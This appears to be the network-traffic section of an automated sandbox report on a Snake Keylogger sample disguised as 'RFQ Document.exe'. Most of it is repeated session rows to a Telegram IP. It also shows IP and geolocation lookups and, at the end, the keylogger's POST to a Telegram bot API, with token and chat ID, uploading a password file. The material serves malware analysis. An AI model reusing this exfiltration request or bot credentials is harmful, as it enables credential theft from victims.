312	192.168.2.4	50149	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
313	192.168.2.4	50150	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
314	192.168.2.4	50151	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
315	192.168.2.4	50152	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
316	192.168.2.4	50153	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
317	192.168.2.4	50154	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
318	192.168.2.4	50155	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
319	192.168.2.4	50156	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49806	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
320	192.168.2.4	50157	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
321	192.168.2.4	50158	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
322	192.168.2.4	50159	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
323	192.168.2.4	50160	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
324	192.168.2.4	50161	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
325	192.168.2.4	50162	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
326	192.168.2.4	50163	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
327	192.168.2.4	50164	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
328	192.168.2.4	50165	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
329	192.168.2.4	50166	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49807	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
330	192.168.2.4	50167	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
331	192.168.2.4	50168	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
332	192.168.2.4	50169	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
333	192.168.2.4	50170	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
334	192.168.2.4	50171	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
335	192.168.2.4	50172	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
336	192.168.2.4	50173	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
337	192.168.2.4	50174	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
338	192.168.2.4	50175	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
339	192.168.2.4	50176	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49810	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
340	192.168.2.4	50177	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
341	192.168.2.4	50178	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
342	192.168.2.4	50179	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
343	192.168.2.4	50180	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
344	192.168.2.4	50181	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
345	192.168.2.4	50182	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
346	192.168.2.4	50183	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
347	192.168.2.4	50184	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
348	192.168.2.4	50185	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
349	192.168.2.4	50186	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49811	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
350	192.168.2.4	50187	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
351	192.168.2.4	50188	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
352	192.168.2.4	50189	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
353	192.168.2.4	49773	132.226.8.169	80	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 07:58:05.232361078 CEST	1329	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 28, 2021 07:58:05.499944925 CEST	1329	IN	HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 05:58:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 33 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.39</body></html>
Sep 28, 2021 07:58:05.596322060 CEST	1329	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 28, 2021 07:58:05.864909887 CEST	1329	IN	HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 05:58:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 33 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.39</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49812	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49813	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.4	49814	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.4	49815	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49778	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.4	49816	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.4	49817	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.4	49818	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.4	49819	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.4	49820	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.4	49821	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.4	49822	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.4	49823	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.4	49824	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.4	49825	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49779	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.4	49826	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.4	49827	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.4	49828	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.4	49829	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.4	49830	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.4	49831	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.4	49832	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.4	49833	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.4	49834	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.4	49835	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49780	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.4	49836	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.4	49837	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.4	49838	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.4	49839	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.4	49840	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.4	49841	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.4	49842	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.4	49843	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.4	49844	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.4	49845	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49781	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.4	49846	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.4	49847	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.4	49848	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.4	49849	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.4	49850	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.4	49851	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.4	49852	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.4	49853	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.4	49854	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.4	49855	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49782	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.4	49856	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.4	49857	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.4	49858	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.4	49859	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.4	49860	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.4	49861	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.4	49862	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.4	49863	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.4	49864	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.4	49865	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49783	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.4	49866	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.4	49867	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.4	49868	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.4	49869	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.4	49870	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.4	49871	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.4	49872	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.4	49873	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.4	49874	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.4	49875	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49774	172.67.188.154	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	Direction	Data
2021-09-28 05:58:08 UTC	OUT	GET /xml/84.17.52.39 HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
2021-09-28 05:58:08 UTC	IN	HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 05:58:08 GMT Content-Type: application/xml Content-Length: 345 Connection: close vary: Origin x-database-date: Wed, 25 Aug 2021 10:15:20 GMT x-ratelimit-limit: 15000 x-ratelimit-remaining: 14994 x-ratelimit-reset: 3175 CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ce3pmuYF%2B1OsN99Wh3feRT8VZEtjruEOuOfR783o9QV3CkTYoSWaqFLt4qn4hSFHq3WkEwOQqPf05E2yDnczYRyzqnOpyLB72qzs35zdKEFTp75NMuijfLoXF9mMZyS2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 695abcfe0a2c6931-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-28 05:58:08 UTC	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 34 2e 31 37 2e 35 32 2e 33 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 48 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 53 77 69 74 7a 65 72 6c 61 6e 64 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 5a 48 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 5a 75 72 69 63 68 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 5a 75 72 69 63 68 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 31 35 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 Data Ascii: <Response><IP>84.17.52.39</IP><CountryCode>CH</CountryCode><CountryName>Switzerland</CountryName><RegionCode>ZH</RegionCode><RegionName>Zurich</RegionName><City>Zurich</City><ZipCode>8152</ZipCode><TimeZone>Europe/Zurich</TimeZone><Latit

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49775	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:09 UTC	1	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255b68d7103 Host: api.telegram.org Content-Length: 407 Connection: Keep-Alive
2021-09-28 05:58:09 UTC	1	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 62 36 38 64 37 31 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255b68d7103Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
